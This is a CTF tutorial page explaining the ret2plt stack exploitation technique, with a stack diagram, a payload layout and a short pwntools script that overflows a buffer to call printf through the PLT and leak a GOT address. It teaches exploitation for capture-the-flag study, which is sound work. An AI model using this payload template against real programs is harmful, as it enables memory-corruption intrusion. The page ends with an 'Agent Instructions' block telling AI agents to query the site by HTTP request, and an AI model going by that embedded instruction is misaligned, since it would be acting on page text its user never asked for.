# Ret2plt

A **ret2plt** (**return-to-PLT**) attack is a type of exploitation technique that allows an attacker to execute arbitrary code by **redirecting the flow of execution to a function in the Procedure Linkage Table** ([PLT](/pwn/general-knowledge/plt-and-got.md)).

## How it works ?

In a **ret2plt** attack, the attacker **overwrites the return address**, using [buffer overflow](/pwn/stack-exploitation/stack-buffer-overflow/basics.md) or [format string exploit](/pwn/stack-exploitation/format-string/data-leak.md) for example\*\*,\*\* of a function **with the address of a function in the PLT**. When the function returns, the program will jump to the function in the PLT instead of the next instruction in the original code.

{% hint style="warning" %}
The execution of this technique may vary depending on the instruction set architecture and the calling convention used. In this article, the x86 standard calling convention will be used as an example.
{% endhint %}

```
  address   |   values
------------+-------------------------------------------------------------------
            |   +------------------------- Buffer ---------------------------+
0xffffd264: |   |   0x41414141    0x41414141    0x41414141      0x41414141   |
            |   +------------------------------------------------------------+
            |     +- plt addr -+ +-saved eip -+ +--- param --+               |
0xffffd274: |     | 0x565561dd | | 0xffffd35c |	| 0xffffd12c |	0x00000001   |
            |     +------------+ +------------+ +------------+               |
  ...       |    ...
```

In order to make the stack in this state, the following payload must be used :

```bash
[buffer overflow needed lenght][plt function() address][any 4 bytes][parameter]
```

```python
from pwn import * 

elf = ELF('./chall')

payload = flat(
    b'A' * padding,
    elf.plt['printf'],
    elf.symbols['main'],
    elf.got['printf']
)
```

{% hint style="info" %}
In this example, the exploit will call the `printf()` function with the `printf()` address stored in the got as parameter and the execution flaw will return to `main`.
{% endhint %}


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://www.ctfrecipes.com/pwn/stack-exploitation/arbitrary-code-execution/code-reuse-attack/ret2plt.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.